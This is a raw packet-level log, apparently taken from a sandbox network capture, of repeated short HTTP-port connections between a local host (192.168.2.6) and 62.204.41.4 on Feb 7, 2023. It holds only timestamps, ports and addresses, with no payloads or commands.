                          Feb 7, 2023 20:02:20.584894896 CET5003980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.645431042 CET805003962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.648364067 CET805003962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.648467064 CET5003980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.756328106 CET5003980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.757563114 CET5004080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.816925049 CET805003962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.817105055 CET5003980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.817948103 CET805004062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.818118095 CET5004080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.818779945 CET5004080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:20.879122019 CET805004062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.881772995 CET805004062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:20.881984949 CET5004080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.002744913 CET5004080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.003887892 CET5004180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.063389063 CET805004062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.065495014 CET805004162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.065675020 CET5004080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.065758944 CET5004180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.067703009 CET5004180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.129288912 CET805004162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.132908106 CET805004162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.133110046 CET5004180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.236677885 CET5004180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.237432957 CET5004280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.297755003 CET805004262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.297971964 CET5004280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.298286915 CET805004162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.298484087 CET5004280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.298525095 CET5004180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.358817101 CET805004262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.361246109 CET805004262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.366961002 CET5004280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.471060038 CET5004280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.474700928 CET5004380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.531544924 CET805004262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.532489061 CET5004280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.535023928 CET805004362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.535206079 CET5004380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.535773993 CET5004380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.596085072 CET805004362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.598689079 CET805004362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.599201918 CET5004380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.705641031 CET5004380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.706994057 CET5004480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.766244888 CET805004362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.766345024 CET5004380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.767419100 CET805004462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.771270037 CET5004480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.772716045 CET5004480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.833169937 CET805004462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.835486889 CET805004462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:21.835721016 CET5004480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.961766958 CET5004480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:21.962544918 CET5004580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.022452116 CET805004462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.022664070 CET805004562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.022712946 CET5004480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.022805929 CET5004580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.023469925 CET5004580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.083698988 CET805004562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.087369919 CET805004562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.087559938 CET5004580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.206316948 CET5004580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.208359003 CET5004680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.266917944 CET805004562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.267020941 CET5004580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.270801067 CET805004662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.271056890 CET5004680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.274271011 CET5004680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.336585999 CET805004662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.339755058 CET805004662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.339931965 CET5004680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.455310106 CET5004680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.456630945 CET5004780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.517482042 CET805004762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.517785072 CET5004780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.518083096 CET805004662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.518198013 CET5004680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.518279076 CET5004780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.578528881 CET805004762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.581559896 CET805004762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.581743956 CET5004780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.690356016 CET5004780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.691622972 CET5004880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.750931978 CET805004762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.751049995 CET5004780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.752931118 CET805004862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.753129959 CET5004880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.753627062 CET5004880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.814971924 CET805004862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.817059040 CET805004862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.817246914 CET5004880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.929347992 CET5004880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.941957951 CET5004980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:22.990772009 CET805004862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:22.990955114 CET5004880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.002365112 CET805004962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.002537966 CET5004980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.003140926 CET5004980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.063879013 CET805004962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.067365885 CET805004962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.067502975 CET5004980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.175148964 CET5004980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.178806067 CET5005080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.235583067 CET805004962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.235748053 CET5004980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.240379095 CET805005062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.240492105 CET5005080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.248250008 CET5005080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.309775114 CET805005062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.312478065 CET805005062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.312623024 CET5005080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.429961920 CET5005080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.431061029 CET5005180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.491501093 CET805005062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.491583109 CET5005080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.493475914 CET805005162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.493606091 CET5005180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.494294882 CET5005180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.558233023 CET805005162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.559998035 CET805005162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.560097933 CET5005180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.674943924 CET5005180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.675959110 CET5005280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.736737013 CET805005262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.736993074 CET5005280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.737397909 CET805005162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.737497091 CET5005180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.740042925 CET5005280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.800796032 CET805005262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.802834988 CET805005262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.802989006 CET5005280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.935904980 CET5005280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.936995983 CET5005380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.996795893 CET805005262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.997014046 CET5005280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:23.998224974 CET805005362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:23.998424053 CET5005380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.008848906 CET5005380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.070233107 CET805005362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.073893070 CET805005362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.075428963 CET5005380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.189515114 CET5005380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.190567017 CET5005480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.251131058 CET805005362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.251508951 CET5005380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.251964092 CET805005462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.252130032 CET5005480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.270996094 CET5005480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.333161116 CET805005462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.336196899 CET805005462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.336281061 CET5005480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.439682007 CET5005480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.440939903 CET5005580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.501312017 CET805005462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.503274918 CET805005562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.503420115 CET5005480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.503467083 CET5005580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.503968954 CET5005580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.566422939 CET805005562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.568763018 CET805005562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.568952084 CET5005580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.690260887 CET5005580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.691221952 CET5005680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.752438068 CET805005662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.752718925 CET805005562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.752945900 CET5005680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.752950907 CET5005580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.870217085 CET5005680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:24.931610107 CET805005662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.933780909 CET805005662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:24.934000969 CET5005680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.238188982 CET5005680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.239690065 CET5005780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.299568892 CET805005662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.299777031 CET5005680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.301054001 CET805005762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.301220894 CET5005780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.359863043 CET5005780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.423043966 CET805005762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.425580025 CET805005762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.425724983 CET5005780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.565243006 CET5005780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.566910982 CET5005880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.627029896 CET805005762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.627067089 CET805005862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.627213955 CET5005780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.627314091 CET5005880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.697906017 CET5005880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.758203030 CET805005862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.760538101 CET805005862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.760694981 CET5005880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.898098946 CET5005880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.899074078 CET5005980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.958416939 CET805005862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.958620071 CET5005880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:25.959604979 CET805005962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:25.959772110 CET5005980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:26.009358883 CET5005980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:26.070010900 CET805005962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:26.073587894 CET805005962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:26.074883938 CET5005980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:26.340658903 CET5005980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:26.341775894 CET5006080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:26.403785944 CET805005962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:26.404006004 CET5005980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:26.406008959 CET805006062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:26.406199932 CET5006080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:26.448813915 CET5006080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:26.511230946 CET805006062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:26.515285015 CET805006062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:26.515528917 CET5006080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:27.646684885 CET5006080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:27.647769928 CET5006180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:27.708091021 CET805006162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:27.708333015 CET5006180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:27.709081888 CET805006062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:27.709178925 CET5006080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:27.765974045 CET5006180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:27.826277018 CET805006162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:27.830638885 CET805006162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:27.830859900 CET5006180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:27.963113070 CET5006180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:27.966206074 CET5006280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.023358107 CET805006162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:28.023572922 CET5006180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.027036905 CET805006262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:28.027271032 CET5006280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.090657949 CET5006280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.151420116 CET805006262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:28.155061007 CET805006262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:28.155318022 CET5006280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.321257114 CET5006280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.322308064 CET5006380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.382205963 CET805006262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:28.382424116 CET5006280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.383866072 CET805006362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:28.384057045 CET5006380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.396717072 CET5006380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:28.458342075 CET805006362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:28.460707903 CET805006362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:28.460892916 CET5006380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.562225103 CET5006380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.563299894 CET5006480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.624449968 CET805006362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:30.624627113 CET5006380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.625957012 CET805006462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:30.626157045 CET5006480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.633739948 CET5006480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.699162006 CET805006462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:30.702920914 CET805006462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:30.703129053 CET5006480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.866869926 CET5006480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.867904902 CET5006680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.928050041 CET805006662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:30.928307056 CET5006680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.929387093 CET805006462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:30.929483891 CET5006480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:30.943301916 CET5006680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.003230095 CET805006662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.006328106 CET805006662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.006530046 CET5006680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.129306078 CET5006680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.130044937 CET5006780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.190140963 CET805006662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.190355062 CET5006680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.190592051 CET805006762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.190769911 CET5006780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.198972940 CET5006780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.263186932 CET805006762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.264014006 CET805006762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.264123917 CET5006780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.379312992 CET5006780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.380337000 CET5006880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.439749956 CET805006762.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.439918995 CET5006780192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.441618919 CET805006862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.441833019 CET5006880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.452025890 CET5006880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.513511896 CET805006862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.516680002 CET805006862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.516825914 CET5006880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.665919065 CET5006880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.666872025 CET5006980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.727471113 CET805006862.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.727596998 CET5006880192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.728121042 CET805006962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.728400946 CET5006980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.730232000 CET5006980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.791558981 CET805006962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.794500113 CET805006962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.794682026 CET5006980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.910105944 CET5006980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.911206007 CET5007080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.971451044 CET805006962.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.971652985 CET5006980192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.972697020 CET805007062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:31.972866058 CET5007080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:31.982507944 CET5007080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.044183969 CET805007062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.048238039 CET805007062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.048413038 CET5007080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.161524057 CET5007080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.175312042 CET5007180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.223228931 CET805007062.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.223476887 CET5007080192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.234772921 CET805007162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.235024929 CET5007180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.235512018 CET5007180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.294858932 CET805007162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.298506021 CET805007162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.298723936 CET5007180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.409181118 CET5007180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.411472082 CET5007280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.468859911 CET805007162.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.470575094 CET5007180192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.473032951 CET805007262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.475322962 CET5007280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.475919008 CET5007280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.537333012 CET805007262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.540923119 CET805007262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.541186094 CET5007280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.644891977 CET5007280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.646042109 CET5007380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.706507921 CET805007262.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.706940889 CET5007280192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.708451033 CET805007362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.708693027 CET5007380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.709343910 CET5007380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.771754980 CET805007362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.774380922 CET805007362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.774530888 CET5007380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.878391027 CET5007380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.879451036 CET5007480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.939965963 CET805007462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.940113068 CET5007480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.940709114 CET5007480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:32.940853119 CET805007362.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:32.940934896 CET5007380192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.001205921 CET805007462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.003427982 CET805007462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.006333113 CET5007480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.113069057 CET5007480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.114269018 CET5007580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.173623085 CET805007462.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.173996925 CET5007480192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.174490929 CET805007562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.174731016 CET5007580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.175281048 CET5007580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.235548973 CET805007562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.239239931 CET805007562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.239322901 CET5007580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.347923040 CET5007580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.348867893 CET5007680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.408483982 CET805007662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.408533096 CET805007562.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.408735991 CET5007580192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.409322977 CET5007680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.409322977 CET5007680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.468972921 CET805007662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.471015930 CET805007662.204.41.4192.168.2.6
                          Feb 7, 2023 20:02:33.471221924 CET5007680192.168.2.662.204.41.4
                          Feb 7, 2023 20:02:33.595933914 CET5007680192.168.2.662.204.41.4
